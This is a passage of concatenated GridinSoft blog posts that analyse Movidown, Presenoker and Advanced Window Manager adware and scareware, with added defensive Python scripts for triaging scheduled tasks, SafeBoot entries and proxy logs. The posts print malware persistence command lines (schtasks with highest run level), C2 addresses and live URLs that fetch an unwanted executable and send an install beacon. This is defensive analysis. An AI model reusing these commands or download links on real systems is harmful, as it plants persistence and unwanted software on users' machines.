C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

The first entry (the Run key) adds the utility to startup, while the two scheduled tasks make sure the payload runs at every logon and every hour, with the highest run level. It's important to note that while the utility is capable of reading keyboard input, this functionality isn't inherently malicious: it is needed for hotkeys.
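The two schtasks lines above carry every signal an analyst would use to call this persistence malicious, and the same rules can be applied to a whole sandbox trace. The script below is an added example, not GridinSoft's or Movidown's code: it parses schtasks /create command lines and scores them. The two Movidown lines are copied from this post; the third, benign-looking line, the ExampleVendor path and the scoring rules are assumptions made for the demo, and nothing is read from a live system.

```python
"""Triage scheduled-task persistence from a sandbox trace.

Added example (not GridinSoft's code). Parses `schtasks /create` command
lines and scores each one against rules an analyst applies by hand.
"""
import re
from collections import defaultdict

# The two schtasks lines from the Movidown trace, plus a constructed benign
# entry (ExampleVendor is an invented name) for contrast.
TRACE = [
    'schtasks /create /f /RU "" /tr "C:\\ProgramData\\jewkkwnf\\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST',
    'schtasks /create /f /RU "" /tr "C:\\ProgramData\\jewkkwnf\\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST',
    'schtasks /create /tr "C:\\Program Files\\ExampleVendor\\update.exe" /tn "ExampleVendor Update" /sc DAILY /rl LIMITED',
]

# A double-quoted string (group 1) or a run of non-blank characters (group 2).
TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Locations a standard user can write to; nothing legitimate should schedule
# highest-privilege tasks from here.
USER_WRITABLE = re.compile(r"^[A-Za-z]:\\(ProgramData|Users\\[^\\]+\\AppData)\\", re.I)

# Schedules that bring a payload back on their own.
RESPAWN = {"MINUTE", "HOURLY", "ONLOGON", "ONSTART"}


def parse_schtasks(cmd):
    """Map every /switch of a schtasks /create line to its argument (or True)."""
    tokens = [m.group(1) if m.group(1) is not None else m.group(2)
              for m in TOKEN.finditer(cmd)]
    if not tokens or tokens[0].lower() != "schtasks":
        raise ValueError("not a schtasks command line")
    opts, i = {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].lower()
            nxt = tokens[i + 1] if i + 1 < len(tokens) else None
            # /create and /f take no argument; everything else consumes the next token
            # (an empty quoted string such as /RU "" is still an argument).
            if nxt is not None and not nxt.startswith("/"):
                opts[key] = nxt
                i += 2
                continue
            opts[key] = True
        i += 1
    return opts


def score_task(opts):
    """Return the reasons a parsed task looks like malware persistence."""
    reasons = []
    exe = opts.get("tr", "")
    if USER_WRITABLE.match(exe):
        reasons.append("binary lives in a user-writable directory")
    if str(opts.get("rl", "")).upper() == "HIGHEST":
        reasons.append("requests the highest run level")
    sched = str(opts.get("sc", "")).upper()
    if sched in RESPAWN:
        reasons.append("respawns on " + sched)
    parts = exe.split("\\")
    # Dropper pattern seen above: C:\ProgramData\<name>\<name>.exe
    if len(parts) >= 2 and parts[-1].lower().rsplit(".", 1)[0] == parts[-2].lower():
        reasons.append("executable sits in a same-named folder (dropper naming pattern)")
    return reasons


def triage(lines):
    """Parse, score and group by executable: {exe: {'tasks', 'score', 'reasons'}}."""
    report = defaultdict(lambda: {"tasks": [], "score": 0, "reasons": []})
    for line in lines:
        opts = parse_schtasks(line)
        entry = report[opts.get("tr", "")]
        entry["tasks"].append(opts.get("tn", "?"))
        for reason in score_task(opts):
            if reason not in entry["reasons"]:
                entry["reasons"].append(reason)
        entry["score"] = len(entry["reasons"])
    return dict(report)


if __name__ == "__main__":
    for exe, info in sorted(triage(TRACE).items(), key=lambda kv: -kv[1]["score"]):
        print(f"{info['score']}  {exe}  tasks={info['tasks']}")
        for reason in info["reasons"]:
            print("     -", reason)
```

Grouping by executable is what makes the picture obvious: the same ProgramData binary is registered twice, once hourly and once at logon, so killing the process or deleting one task is not enough. On a real host the same rules can be fed from the output of schtasks /query /fo LIST /v.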

C2 Connection

During execution, Movidown communicates with several servers and also fetches what appear to be certificates. The two crt.sectigo.com requests are the standard Authenticode chain-building traffic Windows generates when it verifies a signed executable (an AIA fetch of the issuing CA certificates); they indicate that a code-signed binary is being checked, not that the malware obtains a certificate of its own. The remaining connections are the ones worth looking at:

TCP 204.79.197.203:443
TCP 77.105.164.24:50505
TCP 23.59.198.43:443
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200

It's also worth noting that this unwanted app contacts a server at 77.105.164.24, based in Russia, on a non-standard port (50505). Neither the software itself nor any public information about it explains this connection, so it is worth keeping in mind.

How to Remove Movidown

Removing the Movidown utility itself is straightforward: you can uninstall it using the standard Windows "Installed apps" menu. However, the unwanted software it installs alongside itself can be more challenging to remove, because of the scheduled tasks and file copies described above. I recommend using GridinSoft Anti-Malware, as this solution will allow you to remove Movidown and its payload in just a few clicks. It will also provide long-term protection against any kind of malicious software, and from network threats as well. To remove this unwanted software, follow the instructions below:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

What is PUA:Win32/Presenoker? https://gridinsoft.com/blogs/pua-win32-presenoker-adware/ https://gridinsoft.com/blogs/pua-win32-presenoker-adware/#respond Thu, 27 Jun 2024 11:09:30 +0000 https://gridinsoft.com/blogs/?p=21717 PUA:Win32/Presenoker is an adware designed to make money by showing intrusive advertisements and collecting data. This malware can take control of your web browser and send you to advertising pages. The majority of them will be questionable, without even a slight tint of relevance. It is often disguised as legitimate cracked software, driver finder, or […]

The post What is PUA:Win32/Presenoker? appeared first on Gridinsoft Blog.

PUA:Win32/Presenoker is adware designed to make money by showing intrusive advertisements and collecting data. This malware can take control of your web browser and send you to advertising pages. The majority of them will be questionable, with little or no relevance to what the user was looking for.

It is often disguised as legitimate software: cracked programs, driver finders, or system tweakers. This malware can also steal some information.

PUA:Win32/Presenoker Overview

PUA:Win32/Presenoker is adware designed to generate revenue through intrusive advertisements. In addition to malvertising, it collects users' data, including search history, cookies, and other browsing information. It also gathers basic system information, but only for fingerprinting the system; it does not target saved passwords the way a stealer would. Almost all instances of this malware are connected to websites that redirect users to advertising pages. While some pages it advertises are legitimate, others are questionable, significantly degrading the user experience.

PUA:Win32/Presenoker detection window screenshot
PUA:Win32/Presenoker detection window

PUA:Win32/Presenoker often spreads under the guise of cracked legitimate software, tricking users and infiltrating their devices without their consent. The malware also masquerades as a laptop driver finder or tweaker. In practice, almost any download that does not come from an official website can lead to a Presenoker infection.

Presenoker Technical Analysis

Let's break down its behavior based on the analysis of a PUA:Win32/Presenoker sample. As I said above, the malware infiltrates the system under the guise of legitimate software. In our case, it is a free Windows kernel research tool (PCHunter, judging by the URLs in the C2 section below).

Once on the system, the malware seeks persistence. To do so, it performs standard actions: it creates driver files, registers them as services, and adds them to the SafeBoot\Minimal list, so that its drivers are loaded even when the user boots into Safe Mode.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bajejyicthbeby.sys
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bhrzxcfdwsfytp.sys
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\boalxrinybzftbduk.sys

The malware created a SafeBoot\Minimal entry for each of its driver files to ensure they are loaded in "Safe Mode with minimal drivers", the diagnostic mode of Windows that loads only essential components. This is a deliberate trick: a user who boots into Safe Mode to clean the system still gets the malicious drivers loaded. Any .sys entry in this key that does not belong to a known driver is worth checking.
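The SafeBoot\Minimal key is small and changes rarely, so it is a good place for a baseline comparison. The script below is an added example, not GridinSoft's code: it parses a .reg export of the key and separates entries into a known baseline, unknown entries that need a manual look, and unknown entries whose names look machine-generated, as the three driver names above do. The .reg text is constructed for the demo (the three bajejyicthbeby/bhrzxcfdwsfytp/boalxrinybzftbduk names are taken from this post, exampleav.sys is invented), and the BASELINE set is an assumption that should be seeded from a known-clean machine of the same Windows build.

```python
"""Flag unknown and randomly named drivers in a SafeBoot\\Minimal .reg export.

Added example (not GridinSoft's code). The .reg text is constructed;
BASELINE is an assumption to be replaced with entries from a clean system.
"""
import re

SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys]
@="FSFilter System Recovery"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\exampleav.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bajejyicthbeby.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\bhrzxcfdwsfytp.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\boalxrinybzftbduk.sys]
@="Driver"
"""

# Subkey lines of the SafeBoot\Minimal key; group 1 is the entry name.
KEY_LINE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)"
    r"\\Control\\SafeBoot\\Minimal\\([^\]]+)\]$", re.I)

# Assumed baseline (lowercase). Seed it from a clean reference machine.
BASELINE = {
    "vga.sys", "vgasave.sys", "sr.sys", "base", "boot bus extender",
    "boot file system", "file system", "filter", "pci configuration",
    "primary disk", "scsi class", "system bus extender",
}

VOWELS = set("aeiou")
CONSONANT_RUN = re.compile(r"[b-df-hj-np-tv-z]+")


def safeboot_entries(reg_text):
    """Return {entry_name: default_value} for every subkey in the export."""
    entries, current = {}, None
    for line in reg_text.splitlines():
        m = KEY_LINE.match(line.strip())
        if m:
            current = m.group(1)
            entries[current] = ""
        elif current and line.startswith("@="):
            entries[current] = line[2:].strip().strip('"')
    return entries


def looks_random(name):
    """Crude generated-name test: few vowels or a long consonant run."""
    stem = name.lower().rsplit(".", 1)[0]
    letters = [c for c in stem if c.isalpha()]
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    longest_run = max((len(r) for r in CONSONANT_RUN.findall(stem)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 4


def classify(reg_text, baseline=BASELINE):
    """Map each entry to 'baseline', 'review' (unknown) or 'suspicious' (unknown + random name)."""
    verdicts = {}
    for name in safeboot_entries(reg_text):
        if name.lower() in baseline:
            verdicts[name] = "baseline"
        elif looks_random(name):
            verdicts[name] = "suspicious"
        else:
            verdicts[name] = "review"
    return verdicts


def suspicious(reg_text, baseline=BASELINE):
    """Sorted list of entries that are both unknown and randomly named."""
    return sorted(n for n, v in classify(reg_text, baseline).items() if v == "suspicious")


if __name__ == "__main__":
    for name, verdict in classify(SAMPLE_REG).items():
        print(f"{verdict:10s} {name}")
```

Export the key with reg export "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" safeboot.reg and feed the file to classify(). The name heuristic is deliberately crude and only a tie-breaker: the real signal is "not in the baseline", and every "review" entry should be traced to a service and a signed driver file before it is trusted.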

C2 Communication

Presenoker makes multiple HTTP requests to various URLs, including ww1.epoolsoft[.]com and www.epoolsoft[.]com, which suggests communication with a command-and-control (C2) server. TCP connections are also established to several IP addresses on ports 80 and 443.

TCP 63.143.32.86:80
TCP 64.190.63.136:80
UDP a83f:8110:0:0:6076:c7a:e801:0:53

The malware most likely receives its adverts through some of these channels: opening some of these addresses redirects to the advertised websites.

Presenoker Advertising

As I said before, the primary purpose of this kind of application is advertising. These ads often promote online scams, unreliable or hazardous software, and malware. When clicked, some ads can run scripts that download or install software without the user's consent.

In rare cases, users will see what looks like a legitimate search site such as Yahoo or Bing, but with altered results. The URLs below are the intermediary sites that appear in the address bar during this redirection; they appear to collect the search queries and likely other browsing data.

hxxp://www.epoolsoft[.]com/PCHunter_StandardV1.56=DE8D8650A2322F6FBD61DC24EA6CE9703EDC1C1ABBA4523E236D3DE26CFD2B49C08503DEEA5AEDF515739967BDA959FD
hxxp://ww1.epoolsoft[.]com/?sub1=39aa0efd-0311-11ef-af09-729c7805264a
hxxp://www.epoolsoft[.]com/pchunter/pchunter_free

This website contains links that, when clicked, redirect you through adsensecustomsearchads.com.

Redirect address screenshot

Defense Evasion

The malware uses IsDebuggerPresent and SetWindowsHookExW, the former to detect a debugger and the latter to install hooks. The PE file has a non-.text section that barely compresses (a zlib compression ratio below 0.011 in the sandbox report), which usually means the section holds packed or encrypted code. It also checks for debuggers by window names and for virtual machines by hardware and firmware identifiers, and it may use evasive loops to hinder dynamic analysis.

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

As the names suggest, these keys hold BIOS information. That is enough to tell whether the system is a virtual machine or some other modified environment, since hypervisors usually report their own vendor strings there.

How To Remove PUA:Win32/Presenoker?

To remove PUA:Win32/Presenoker you need to use a powerful antimalware solution. GridinSoft Anti-Malware will be an excellent choice to clean your system from unwanted software. In addition to cleaning, this solution will prevent future infections on your device.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

How to Remove Advanced Window Manager Adware https://gridinsoft.com/blogs/advanced-window-manager/ https://gridinsoft.com/blogs/advanced-window-manager/#respond Mon, 20 May 2024 15:57:49 +0000 https://gridinsoft.com/blogs/?p=22210 Advanced Window Manager is potentially unwanted software that floods users’ systems with advertisements. It pretends to be a tool that adds new functionality to Windows, but in fact redirects search queries, tracks users’ internet activity, and displays advertisements. Typical distribution methods include software bundling and malvertising. Potentially unwanted adware program that displays unwanted advertisements and […]

The post How to Remove Advanced Window Manager Adware appeared first on Gridinsoft Blog.

Advanced Window Manager is potentially unwanted software that floods users’ systems with advertisements. It pretends to be a tool that adds new functionality to Windows, but in fact redirects search queries, tracks users’ internet activity, and displays advertisements. Typical distribution methods include software bundling and malvertising.


Advanced Window Manager Overview

Advanced Window Manager is an unwanted adware-like program. Despite positioning itself as a useful utility, its primary purpose is to bombard users with advertisements. The program frequently promotes fraudulent or malicious content, posing significant security risks. Clicking on any promotions displayed by Advanced Window Manager may redirect users to malicious websites that automatically download additional potentially unwanted software.

Advanced Window Manager executable file in Windows Explorer showing suspicious properties
Advanced Window Manager executable file with misleading properties
Attribute Details
Threat Type Adware / PUP (Potentially Unwanted Program)
Detection Names Win32/Adware.AdvancedWindowManager, PUP.Optional.WindowManager
Symptoms Unwanted advertisements, browser redirects, slower system performance
Distribution Methods Software bundling, malvertising, freeware downloads
Damage Privacy issues, browser hijacking, exposure to malicious websites
Removal Anti-malware software (recommended), manual removal possible

Another undeclared feature is collecting information about users' internet activity. This data includes search queries, visited URLs, geolocation data, and IP addresses, which are then sold to third parties. Advanced Window Manager is typically distributed as bundled software alongside other programs. Since it is not particularly stealthy, users can spot its processes in Task Manager.

Detailed Analysis

Let's analyze how Advanced Window Manager behaves in the system to understand its true nature. It arrives through an installer wrapper that runs before the program the user actually wanted and performs basic system checks. During installation, the unwanted software extracts the following files to a temporary folder (the 7zS* name is what 7-Zip self-extracting installers use for their temporary extraction directory):

C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\libcurlpp.dll
C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\libstdc++-6.dll
C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\libcurl.dll

It also touches several other files, including system binaries it loads and further components of the bundle:

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll
%WINDIR%\System32\rundll32.exe
C:\Users\<USER>\AppData\Local\Temp\7zSC8C4B203\metina_5.exe
C:\Users\<USER>\AppData\Local\Temp\7zSC8C4B203\metina_6.exe

Installation

Once installed, Advanced Window Manager (sample on VirusTotal) begins performing its main task: flooding the system with advertisements. It first reads the following registry values, which reveal the system's region and locale and let the installer pick "relevant" programs to push:

\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM\Ime File
\Registry\Machine\Software\Policies\Microsoft\System\DNSclient

After completing this check, the program connects to its command and control server. In our analysis, one of the requests that followed the initial connection downloaded and installed an unwanted program called Ultra Media Burner, and a further request reported the installation to an affiliate tracking endpoint. Which offer is delivered likely depends on the results of the geolocation check.

GET http://limesfile.com
GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/UltraMediaBurner.exe
GET http://estrix.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139
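The sequence above, an executable fetched over plain HTTP followed by an "install impression" beacon from the same host, is a recognizable bundler signature in proxy logs. The script below is an added example, not GridinSoft's code: it runs two simple rules over log lines and correlates them per client so that the download-then-beacon chain surfaces as one high-severity finding. The log format, the client addresses, the update.example-vendor.com and www.example.org lines and the beacon keyword lists are constructed for the demo; the two limesfile.com/estrix.xyz requests mirror the ones quoted above.

```python
"""Spot bundler download-and-report chains in an HTTP proxy log.

Added example (not GridinSoft's code). The log lines below are constructed:
"<client> <method> <url> <status>" per line.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG = """\
10.0.0.5 GET http://limesfile.com/ 200
10.0.0.5 GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/UltraMediaBurner.exe 200
10.0.0.5 GET http://estrix.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139 200
10.0.0.5 GET https://update.example-vendor.com/app/setup-3.2.exe 200
10.0.0.7 GET https://www.example.org/index.html 200
"""

EXECUTABLE = re.compile(r"\.(exe|msi|scr)$", re.I)
# Path words and query parameters typical of install/affiliate reporting
# (assumed list for the demo; extend from your own telemetry).
BEACON_PATH = re.compile(r"install|impression|postback|conversion", re.I)
BEACON_PARAMS = {"oid", "sub1", "aff", "affid", "key"}


def parse_line(line):
    """Split one constructed log line into its fields plus a parsed URL."""
    client, method, url, status = line.split()
    return {"client": client, "method": method, "url": url,
            "status": int(status), "parts": urlsplit(url)}


def classify_request(req):
    """Return [(severity, reason)] for a single request."""
    p = req["parts"]
    findings = []
    if EXECUTABLE.search(p.path):
        # Unencrypted downloads are the bigger problem: anyone on the path can swap the file.
        severity = "high" if p.scheme == "http" else "info"
        findings.append((severity, "executable download over " + p.scheme.upper()))
    params = set(parse_qs(p.query, keep_blank_values=True))
    if BEACON_PATH.search(p.path) or (params & BEACON_PARAMS):
        findings.append(("medium", "install/affiliate beacon"))
    return findings


def triage(log_text):
    """Classify every request and correlate beacons with a preceding download per client."""
    alerts = []
    last_exe = {}  # client -> URL of the most recent executable download
    for line in log_text.strip().splitlines():
        req = parse_line(line)
        for severity, reason in classify_request(req):
            alerts.append((req["client"], severity, reason, req["url"]))
            if "executable" in reason:
                last_exe[req["client"]] = req["url"]
            elif "beacon" in reason and req["client"] in last_exe:
                # Download followed by a report-back is the bundler chain described above.
                alerts.append((req["client"], "high",
                               "install chain: beacon after " + last_exe[req["client"]],
                               req["url"]))
    return alerts


if __name__ == "__main__":
    for client, severity, reason, url in triage(LOG):
        print(f"{severity:6s} {client:10s} {reason}  {url}")
```

The per-client state is intentionally minimal (only the last executable seen); on real traffic you would add a time window and exclude your own software-distribution hosts, but the point stands that the beacon, not the download, is what tells you an installer just ran.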

Additional Checks & Persistence

As a typical adware specimen, Advanced Window Manager performs a series of checks to determine the system's location. By reading various registry keys, it obtains networking and DNS configuration. It is unlikely to implement geofencing; this data is primarily used to target advertisements more effectively.

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Dnscache\InterfaceSpecificParameters\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsPolicyConfig

The sandbox trace also shows the program touching another set of registry keys related to Windows services and drivers. A caveat is in order here: services named MpKsl followed by a hexadecimal suffix belong to Microsoft Defender's kernel-mode scanner and are created while Defender inspects a file, so their appearance in the trace is a side effect of the sample being scanned rather than persistence of its own. The persistence that can actually be attributed to Advanced Window Manager is the scheduled task shown in the screenshot below.

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MpKsl9a97d018\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MpKslcbc6775c\Parameters
Advanced Window Manager tasks in Windows Task Scheduler showing automated execution
Advanced Window Manager adds itself to the Windows Task Scheduler to ensure automatic execution at startup

Advertising, Search Redirects and Browser Hijacking

After completing all preparations, Advanced Window Manager functions as adware or a browser hijacker. The most common scenario after installing this type of software is browser hijacking. The PUP changes the homepage and default search engine to ones it promotes (usually Bing or Yahoo). Users may also encounter lesser-known search engines like Chromstera set as the homepage or default search engine. In such cases, all queries are routed through these services, and the forced search engine change stays in effect until the browser settings are reset.

Intrusive pop-up advertisements displayed in web browser after Advanced Window Manager infection
Suspicious and potentially harmful advertisements displayed in the browser after Advanced Window Manager infection

In addition to displaying irrelevant search results, the adware fills pages with advertisements and pop-ups, making web browsing extremely difficult. Another aspect of browser hijackers is collecting telemetry about users. Although such software typically does not steal passwords or other sensitive information, it routes all search queries through its servers, thereby collecting general analytics about user behavior.

How To Remove Advanced Window Manager?

To remove Advanced Window Manager completely from your system, you’ll need to perform several steps. We recommend using specialized anti-malware software for the most thorough cleanup, but we’ve also included manual removal steps below.

Automated Removal with GridinSoft Anti-Malware

Using anti-malware software is the most reliable way to remove Advanced Window Manager and all its components. We recommend GridinSoft Anti-Malware for this task.

Step 1: Download and Install GridinSoft Anti-Malware

First, download GridinSoft Anti-Malware using the button below. Close all browsers before starting the installation process.

Step 2: Run a Full System Scan

Launch GridinSoft Anti-Malware and click on the “Scan” button to begin a comprehensive system scan. This will detect Advanced Window Manager and any other potentially unwanted applications on your system.

GridinSoft Anti-Malware main interface with Scan button highlighted

Step 3: Remove Detected Threats

After the scan completes, you’ll see a list of detected threats, including Advanced Window Manager components. Select all items and click the “Clean Now” button to remove them.

GridinSoft Anti-Malware scan results showing detected Advanced Window Manager components

Step 4: Reset Your Browsers

To completely remove any browser modifications made by Advanced Window Manager, you should reset your browsers to their default settings. In GridinSoft Anti-Malware:

  1. Go to the “Tools” tab
  2. Select “Reset Browser Settings”
  3. Choose the browsers you want to reset
  4. Click “Reset” to restore default settings
GridinSoft Anti-Malware browser reset tool interface

Step 5: Enable Real-Time Protection

To prevent future infections, enable the Internet Security module in GridinSoft Anti-Malware:

  1. Go to the “Protect” tab
  2. Check the “Internet Security” option
  3. Click “Apply” to save changes
GridinSoft Anti-Malware protection settings panel

Manual Removal Instructions

If you prefer to remove Advanced Window Manager manually, follow these steps. However, note that manual removal is more complex and may not eliminate all components.

Step 1: Uninstall Advanced Window Manager from Control Panel

  1. Press Win + R, type “control panel” and press Enter
  2. Go to “Programs” > “Uninstall a program”
  3. Find “Advanced Window Manager” or any suspicious recently installed programs
  4. Right-click on them and select “Uninstall”

Step 2: Remove the Malicious Scheduled Tasks

  1. Press Win + R, type “taskschd.msc” and press Enter
  2. Look for tasks containing “Advanced Window Manager,” “AWM,” or suspicious random names
  3. Right-click on them and select “Delete”

Step 3: Reset Your Browsers

For Google Chrome:

  1. Open Chrome and click the three dots in the top-right corner
  2. Go to "Settings" > "Reset settings" (in older versions: "Advanced" > "Reset and clean up")
  3. Click “Restore settings to their original defaults”
  4. Click “Reset settings” to confirm

For Mozilla Firefox:

  1. Open Firefox and click the three lines in the top-right corner
  2. Go to “Help” > “More troubleshooting information”
  3. Click “Refresh Firefox” in the top-right corner
  4. Click “Refresh Firefox” to confirm

For Microsoft Edge:

  1. Open Edge and click the three dots in the top-right corner
  2. Go to “Settings” > “Reset settings”
  3. Click “Restore settings to their default values”
  4. Click “Reset” to confirm

Frequently Asked Questions

Is Advanced Window Manager a virus?

Advanced Window Manager is not technically a virus but is classified as a potentially unwanted program (PUP) or adware. While it doesn’t typically damage your system directly like ransomware or trojans, it degrades your browsing experience, invades your privacy by tracking your online activities, and can expose you to malicious content through its advertisements. Many security products detect and flag it as a threat.

How did Advanced Window Manager get installed on my computer?

Advanced Window Manager typically enters systems through software bundling – it’s quietly included with free software downloads where users rush through installation steps without reading carefully. It may also be installed through malvertising (malicious advertisements) that trick users into clicking download buttons, or through deceptive pop-ups claiming your system needs an update or optimization. Always choose custom installation options and read each step when installing new software.

Can Advanced Window Manager steal my personal information?

While Advanced Window Manager doesn’t directly steal passwords or banking details, it does collect browsing data including search queries, websites visited, IP addresses, and geographic location. This information is typically sold to third parties for targeted advertising purposes. The program may also inject advertisements that lead to phishing sites designed to steal sensitive information. For these reasons, it’s important to remove it promptly.

Scareware: How to Identify, Prevent and Remove It https://gridinsoft.com/blogs/what-is-scareware/ https://gridinsoft.com/blogs/what-is-scareware/#respond Tue, 14 May 2024 18:50:38 +0000 https://gridinsoft.com/blogs/?p=7733 Scareware is a widespread Internet fraud scheme that intimidates victims into buying unnecessary or harmful software taking advantage of their ignorance. Scareware usually exploits fears of having a computer virus on a machine and persuades users to purchase fake security software. Here we’ll regard how this spoof works and how not to get fooled by […]

The post Scareware: How to Identify, Prevent and Remove It appeared first on Gridinsoft Blog.

Scareware is a widespread Internet fraud scheme that intimidates victims into buying unnecessary or harmful software, taking advantage of their ignorance. Scareware usually exploits the fear of having a computer virus on the machine and persuades users to purchase fake security software. Here we'll look at how this scam works and how not to get fooled by it. Among other things, we'll touch on the threats associated with scareware.

What is Scareware?

Scareware is a scam that plays on the fears of inexperienced users. Although classic self-replicating computer viruses are rare today, and you will hardly catch one nowadays even if you try, they remain a horror story for people. And the less you know about a threat, the easier it can scare you.

Both trustworthy and scam security products are promoted via advertising. An advertisement for a good solution will respect the customer and emphasize the qualities and features of the promoted program. At most, it will explain that there are many threats out there on the Web and that every endpoint needs protection. Scareware, on the contrary, will try to convince you that your computer is already infected with malware. Moreover, its pushy ads insist on immediate installation of the program they represent, as if it were the last chance to cure your PC.

Scareware Banner
An example of a flashing scareware pop-up banner.

The profitability of the scheme is understandable. People get scared, buy the program and feel like the defenders of their computer system. Perhaps later they will realize they simply threw away their money, but by then they can no longer get it back. There are usually many victims of such deception, and that is the very thing on which the scam relies.

Sadly, losing money is not the worst thing that can happen. Sometimes such malvertising is used as a filter: whoever bought into it definitely does not have a real antivirus. Accordingly, the operators who do business distributing adware and malware can safely install a bunch of harmful programs on the victim's device.

How Scareware Works

It all starts with a person suddenly seeing an advertising banner on some website. The banner itself looks like an automatic notification. Novice users may not even understand that they are dealing with an advertisement.

The message usually says that a scan of the user's computer was carried out and found an infection with dangerous malware. A knowledgeable person could already laugh at this point: a web page cannot scan your disk at all, since the browser does not let a site read local files, let alone run a full scan in the second it takes the banner to appear.

But charlatans deal with inexperienced people and therefore continue their psychological attack. The banners usually include very serious-looking malware names, tables, codes, etc. The more serious the picture looks, the stronger the effect. In its whole appearance, the message tries to look automatic. You can see, for example, the caption "threat level: high", as if the same widget could ever give out a reassuring "low".

Scareware often renders fake scan results with frightening name-dropping.

Such schemes are generally built on a series of psychological techniques. Intimidation is only the first of them. The use of colors plays with the victim’s emotions: red stands for anything related to threats, and as soon as the “rescue” program enters the scene, a soothing blue or green appears. This feeling of possible safety encourages the user to make a purchase. In addition, the price is low: most scareware schemes rely on quick payments combined with a vast number of buyers.

Alternative Scams

There are also more time-consuming schemes. For example, the crooks might launch a massive campaign offering free device scans. To get one, the user must first download the software, whose functionality will be limited until the program is purchased. To make sure that payment still happens, the scan will produce frightening results. This approach targets more educated users.

By the way, scareware is not limited to the security sector. There are other types, such as “cleaners”, that scare users with messages like: “look, a little more and your system will get so clogged with garbage that the device will start freezing.” The advertised program supposedly deletes unused applications, temporary files, etc.

The programs in question can be completely fake, without an iota of the promised functionality. All “treatment” of the device, just like the initial intimidation, can be nothing more than a visual effect.

What are The Threats?

In theory, a scareware victim could get lucky, and the only problem would be the wasted money. But more often than not, a deceptive program leaves an unpleasant payload behind. Its severity varies, corresponding to the danger posed by the unwanted or overtly malicious software that the scareware fetches onto the victim’s computer. In most cases, installing a scareware application will slow the PC down. We proceed from the assumption that scareware developers want more profit from their victims than just the price of the application.

This goal implies infecting the device with one of the following malware types:

  • Adware is a class of relatively harmless unwanted applications. They flood users with ad banners, modify browser settings, add ad links to webpages, etc.
  • Spyware is a more significant threat. Hidden software collects information about the system and the user’s activity and sends it to people who can commercially benefit from having it.
  • Miners are programs that steal the computing resources of the victim’s machine and devote them to mining cryptocurrency (for somebody else, of course). The injured party will also be unpleasantly surprised by the electricity bill.
  • Cybercriminals can add the infected device to a botnet, a controlled network of machines, to perform certain activities on the web without the user’s knowledge.
